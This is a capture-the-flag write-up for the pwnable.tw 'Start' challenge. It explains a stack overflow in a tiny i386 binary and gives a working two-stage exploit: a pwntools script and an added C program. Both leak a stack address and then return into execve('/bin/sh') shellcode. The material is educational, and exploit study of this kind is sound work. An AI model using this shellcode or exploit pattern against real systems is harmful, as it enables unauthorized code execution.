[pwnable.tw] writeups

Start

  • The program is tiny: read, write and exit are done directly with int 0x80 syscalls in hand-written assembly, NX is off, and the read overflows the 0x14-byte stack buffer. So the plan is: leak a stack address first, then write shellcode onto the stack and return into it. The leak comes from returning to 0x08048087, the mov ecx, esp just before the write syscall, which makes the binary print 0x14 bytes of its own stack; the first dword is the esp it saved with its initial push esp.

  • Here I tried writing a simple shellcode myself.

exp:

from pwn import *

context(arch='i386', os='linux', log_level='debug')
p = process('./start')

p.recvuntil(b' CTF:')
#gdb.attach(p)

# Stage 1: 0x14 bytes fill the buffer, the next dword overwrites the saved
# return address with 0x08048087 (mov ecx, esp), so the binary runs
# write(1, esp, 0x14) again and dumps 0x14 bytes of its own stack.
p.send(b'a'*0x14 + p32(0x08048087))

# The first dword of the dump is the esp saved by the binary's initial push esp.
leak_stack = u32(p.recv(4))
log.success("leak stack addr: 0x%x" % leak_stack)

# execve("/bin/sh", NULL, NULL) through int 0x80
shellcode = asm(
'''
sub esp, 0x60       /* move esp away so the pushes below cannot touch the shellcode */
push 0x0068732f     /* "/sh" plus the terminating NUL */
push 0x6e69622f     /* "/bin" */
mov ebx, esp        /* ebx -> "/bin/sh" */
mov eax, 0xb        /* SYS_execve */
xor cl, cl          /* only the low byte of ecx/edx is cleared here; */
xor dl, dl          /* xor ecx, ecx / xor edx, edx would null argv/envp completely */
int 0x80
'''
)

# Stage 2: the second read() lands at leak-4, so its return slot is at
# leak+0x10 and the bytes right after it sit at leak+0x14, where the
# shellcode goes; returning there executes it (no NX).
p.send(b'a'*0x14 + p32(leak_stack+0x14) + shellcode)

p.interactive()
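The same two-stage attack written in C, as an added example that is not part of the original writeup. It assumes the binary layout described above (a 0x14-byte buffer, 0x08048087 being the mov ecx, esp before write(1, esp, 0x14), the leaked dword being the esp saved by the initial push esp, and the second read() of 0x3c bytes landing at leak-4). The shellcode is hand-assembled and, unlike the one above, clears ecx and edx fully; the 0xffffd000 leak value used when no target is given is a constructed sample, and the pipe-driven runner is an assumption about how you would drive ./start non-interactively:

```c
/* Added example, not the writeup's own code: builds both stages of the Start
 * exploit and optionally drives the binary over pipes.  Assumes the layout
 * described in the writeup (0x14-byte buffer, 0x08048087 = `mov ecx, esp`
 * before write(1, esp, 0x14), leaked dword = esp saved by the initial
 * `push esp`, second read() of 0x3c bytes landing at leak-4). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define PAD         0x14         /* buffer start -> saved return address */
#define READ_LEN    0x3c         /* size of the binary's read(0, esp, 0x3c) */
#define LEAK_GADGET 0x08048087u  /* mov ecx, esp ; write ; read ; add esp, 0x14 ; ret */

/* Hand-assembled i386 execve("/bin//sh", NULL, NULL), 23 bytes, no NUL:
 * xor eax,eax ; push eax ; push "//sh" ; push "/bin" ; mov ebx,esp ;
 * xor ecx,ecx ; xor edx,edx ; mov al,0xb ; int 0x80 */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)

static void p32(unsigned char *d, uint32_t v) {
    d[0] = v; d[1] = v >> 8; d[2] = v >> 16; d[3] = v >> 24;   /* little endian */
}
uint32_t u32le(const unsigned char *s) {
    return s[0] | (uint32_t)s[1] << 8 | (uint32_t)s[2] << 16 | (uint32_t)s[3] << 24;
}

/* Stage 1: overwrite the return address so the binary dumps its own stack. */
size_t build_stage1(unsigned char *out) {
    memset(out, 'a', PAD);
    p32(out + PAD, LEAK_GADGET);
    return PAD + 4;
}

/* Stage 2: the second read() lands at leak-4, so its return slot is leak+0x10
 * and the shellcode copied right after it starts at leak+0x14. */
size_t build_stage2(unsigned char *out, uint32_t leak) {
    memset(out, 'a', PAD);
    p32(out + PAD, leak + 0x14);
    memcpy(out + PAD + 4, SHELLCODE, SHELLCODE_LEN);
    return PAD + 4 + SHELLCODE_LEN;
}

/* Sanity check worth running on any hand-assembled payload. */
int shellcode_has_nul(void) {
    return memchr(SHELLCODE, 0, SHELLCODE_LEN) != NULL;
}

static int read_n(int fd, unsigned char *buf, size_t n) {
    for (size_t got = 0; got < n;) {
        ssize_t r = read(fd, buf + got, n - got);
        if (r <= 0) return -1;
        got += (size_t)r;
    }
    return 0;
}

int main(int argc, char **argv) {
    unsigned char s1[READ_LEN], s2[READ_LEN], buf[PAD];
    size_t n1 = build_stage1(s1);
    if (argc < 2) {               /* no target: print stage 2 for a made-up leak */
        size_t n2 = build_stage2(s2, 0xffffd000u);   /* constructed sample value */
        for (size_t i = 0; i < n2; i++) printf("%02x%s", s2[i], i + 1 < n2 ? "" : "\n");
        return 0;
    }
    int in[2], out[2];
    if (pipe(in) || pipe(out)) return 1;
    pid_t pid = fork();
    if (pid == 0) {
        dup2(in[0], 0); dup2(out[1], 1);
        close(in[0]); close(in[1]); close(out[0]); close(out[1]);
        execl(argv[1], argv[1], (char *)NULL);
        _exit(127);
    }
    close(in[0]); close(out[1]);
    if (read_n(out[0], buf, PAD)) return 1;           /* "Let's start the CTF:" */
    (void)!write(in[1], s1, n1);
    if (read_n(out[0], buf, PAD)) return 1;           /* the 0x14-byte stack dump */
    uint32_t leak = u32le(buf);
    fprintf(stderr, "[+] leaked esp: 0x%08x\n", leak);
    /* Pad stage 2 to exactly READ_LEN so the binary's read() cannot also swallow
     * the command meant for the shell that follows it. */
    size_t n2 = build_stage2(s2, leak);
    memset(s2 + n2, 0x90, READ_LEN - n2);
    (void)!write(in[1], s2, READ_LEN);
    (void)!write(in[1], "id\n", 3);                   /* one command, then EOF */
    close(in[1]);
    ssize_t r;
    while ((r = read(out[0], buf, sizeof buf)) > 0) (void)!write(1, buf, (size_t)r);
    waitpid(pid, NULL, 0);
    return 0;
}
```

Run it as `./exploit ./start` to drive the local binary; without an argument it only prints the stage-2 bytes for the sample leak. Padding stage 2 to the full 0x3c bytes matters when the shell command is written into the same pipe right away: otherwise the binary's read() may consume the command as stack filler and the shell would see EOF instead.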